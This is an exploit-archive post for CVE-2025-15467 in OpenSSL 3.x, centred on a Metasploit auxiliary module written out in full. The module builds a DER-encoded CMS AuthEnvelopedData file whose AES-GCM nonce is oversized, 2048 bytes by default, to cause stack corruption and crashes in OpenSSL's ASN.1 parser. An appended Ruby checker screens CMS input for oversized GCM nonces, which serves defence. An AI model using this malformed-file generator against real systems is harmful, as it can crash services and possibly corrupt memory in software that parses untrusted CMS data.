=============================================================================================================================================
| # Title : OpenSSL 3.x ASN.1 AES-GCM Nonce Stack Corruption via CMS AuthEnvelopedData |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.1 (64 bits) |
| # Vendor : https://www.openssl-library.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214422/ & CVE-2025-15467
[+] Summary : This Metasploit auxiliary module generates a specially crafted, DER-encoded CMS file to test a stack-based buffer overflow
in OpenSSL's ASN.1 parser caused by improper handling of oversized AES-GCM nonce (IV) values inside the AES-GCM-Parameters structure defined in RFC 5084.
The malformed structure is embedded inside a valid-looking AuthEnvelopedData CMS container (RFC 5083),
so the file passes basic structural validation while still triggering memory corruption during decoding.
The issue affects multiple OpenSSL 3.x branches when parsing untrusted CMS data: 3.0.x prior to 3.0.19, 3.3.x prior to 3.3.6,
3.4.x prior to 3.4.4, 3.5.x prior to 3.5.5, and 3.6.0 prior to 3.6.1.
A successful trigger may result in stack corruption and an application crash; any further security impact depends on the execution context.
[+] POC :
# -*- coding: binary -*-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'OpenSSL ASN.1 Parser Stack Corruption Test Generator (CVE-2025-15467)',
      'Description' => %q{
        This module generates a CMS file in DER format that simulates an AuthEnvelopedData
        structure according to RFC 5084. It is designed to test for a stack-based buffer
        overflow vulnerability during the ASN.1 decoding process, specifically when
        handling oversized Nonce (IV) lengths within the AES-GCM-Parameters structure.
      },
      'Author'      => [ 'indoushka' ],
      'License'     => MSF_LICENSE,
      'References'  => [
        ['CVE', '2025-15467'],
        ['RFC', '5084'],
        ['RFC', '5083']
      ],
      'Notes'       => {
        'Stability'   => [CRASH_SERVICE_DOWN],
        'Reliability' => [LOW_RELIABILITY]
      }
    ))

    register_options([
      OptString.new('FILENAME', [ true, 'The output file name.', 'openssl_test.cms']),
      OptInt.new('IV_SIZE', [ true, 'The size of the malicious Nonce to trigger stack overwrite.', 2048])
    ])
  end

  # DER TLV: one-byte tag, short-form length below 128, otherwise long form
  # (0x80 | number of length bytes, followed by the big-endian length).
  # The binary coding comment at the top keeps every literal ASCII-8BIT so the
  # \x80+ bytes below concatenate without an Encoding::CompatibilityError.
  def der_encode(tag, data)
    len = data.length
    if len < 128
      tag + [len].pack('C') + data
    else
      len_str = [len].pack('N').sub(/\A\x00+/, '')
      tag + [0x80 | len_str.length].pack('C') + len_str + data
    end
  end

  # ContentInfo wrapping an AuthEnvelopedData (RFC 5083) whose AlgorithmIdentifier
  # names id-aes256-GCM with GCMParameters (RFC 5084) carrying an IV_SIZE-byte nonce.
  def build_cms_structure
    iv_len = datastore['IV_SIZE']
    nonce = der_encode("\x04", "A" * iv_len)                        # aes-nonce OCTET STRING
    gcm_params = der_encode("\x30", nonce)                           # GCMParameters SEQUENCE
    aes_gcm_oid = "\x06\x09\x60\x86\x48\x01\x65\x03\x04\x01\x2E"     # OID 2.16.840.1.101.3.4.1.46 (id-aes256-GCM)
    algo_id = der_encode("\x30", aes_gcm_oid + gcm_params)           # AlgorithmIdentifier SEQUENCE
    content_type_data = "\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x01"   # OID 1.2.840.113549.1.7.1 (id-data)
    encrypted_content_info = der_encode("\x30", content_type_data + algo_id)
    auth_env_body =
      "\x02\x01\x00" +                   # version INTEGER 0
      "\x31\x00" +                       # recipientInfos: empty SET
      encrypted_content_info +           # authEncryptedContentInfo
      "\x04\x10" + ("B" * 16)            # mac OCTET STRING, 16 bytes
    auth_env_oid = "\x06\x0B\x2A\x86\x48\x86\xF7\x0D\x01\x09\x10\x01\x17"   # OID 1.2.840.113549.1.9.16.1.23 (id-ct-authEnvelopedData)
    explicit_content = der_encode("\xA0", auth_env_body)            # [0] EXPLICIT content
    der_encode("\x30", auth_env_oid + explicit_content)              # ContentInfo SEQUENCE
  end

  def run
    file_content = build_cms_structure
    file_create(file_content)
    print_good("Artifact created successfully for Stack Overwrite testing.")
    print_status("RFC 5084 compliant GCM parameters used with IV size: #{datastore['IV_SIZE']}")
  end
end
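The same DER structure read from the defender's side, as an added example that is not part of this module or of OpenSSL: a small TLV walker that finds every AlgorithmIdentifier carrying an AES-GCM OID and returns the length of the GCMParameters nonce, so input like the file this module writes can be screened before a CMS decoder sees it. The OIDs come from RFC 5084; MAX_NONCE, the helper names and the zero-filled sample are assumptions made here.

```ruby
# Added checker (not part of the module above): reports the aes-nonce length of every
# GCMParameters (RFC 5084) bound to an AES-GCM OID anywhere in a DER blob. MAX_NONCE is
# an assumed policy limit (RFC 5084 recommends 12 octets; OpenSSL's EVP_MAX_IV_LENGTH is 16).
AES_GCM_OIDS = {                        # 2.16.840.1.101.3.4.1.{6,26,46} => key size
  "\x60\x86\x48\x01\x65\x03\x04\x01\x06".b => 128,
  "\x60\x86\x48\x01\x65\x03\x04\x01\x1A".b => 192,
  "\x60\x86\x48\x01\x65\x03\x04\x01\x2E".b => 256 }.freeze
MAX_NONCE = 16

def read_tlv(der, off)                  # [tag, value, next_off]; nil if truncated, indefinite or oversized
  return nil if off + 2 > der.bytesize
  tag, len, off = der.getbyte(off), der.getbyte(off + 1), off + 2
  if len >= 0x80                        # long form; 0x80 itself (indefinite length) is not DER
    n = len & 0x7f
    return nil if n.zero? || n > 4 || off + n > der.bytesize
    len, off = der.byteslice(off, n).bytes.inject(0) { |a, b| (a << 8) | b }, off + n
  end
  off + len <= der.bytesize ? [tag, der.byteslice(off, len), off + len] : nil
end

def children(der)                       # sibling [tag, value] pairs; stops at the first bad TLV
  kids, off = [], 0
  while (tlv = read_tlv(der, off))
    kids << tlv[0, 2]
    off = tlv[2]
  end
  kids
end

def gcm_nonce_lengths(der)              # [[key bits, nonce length], ...] at any nesting depth
  children(der.b).flat_map do |tag, val|
    next [] if (tag & 0x20).zero?       # primitive type: nothing to descend into
    kids, hit = children(val), []
    if tag == 0x30 && kids.size >= 2 && kids[0][0] == 0x06 && AES_GCM_OIDS.key?(kids[0][1]) && kids[1][0] == 0x30
      nonce = children(kids[1][1]).first  # GCMParameters ::= SEQUENCE { aes-nonce OCTET STRING, ... }
      hit << [AES_GCM_OIDS[kids[0][1]], nonce[1].bytesize] if nonce && nonce[0] == 0x04
    end
    hit + gcm_nonce_lengths(val)
  end
end

def tlv(tag, body)                      # minimal DER builder, used only for the constructed sample
  body, lb = body.b, [body.bytesize].pack('N').sub(/\A\x00+/, '')
  body.bytesize < 0x80 ? [tag, body.bytesize].pack('CC') + body : [tag, 0x80 | lb.bytesize].pack('CC') + lb + body
end

def sample_cms(nonce_len)               # constructed: skeletal AuthEnvelopedData with a zero-filled aes-nonce
  gcm = tlv(0x30, tlv(0x06, "\x60\x86\x48\x01\x65\x03\x04\x01\x2E") + tlv(0x30, tlv(0x04, "\x00" * nonce_len)))
  eci = tlv(0x30, tlv(0x06, "\x2A\x86\x48\x86\xF7\x0D\x01\x07\x01") + gcm)
  tlv(0x30, tlv(0x02, "\x00") + tlv(0x31, '') + eci)
end
```

Any entry whose length exceeds MAX_NONCE is grounds to reject the input; an empty result for a file that should carry GCM parameters means the walker stopped at a malformed TLV, which is itself a reason to refuse it.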
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================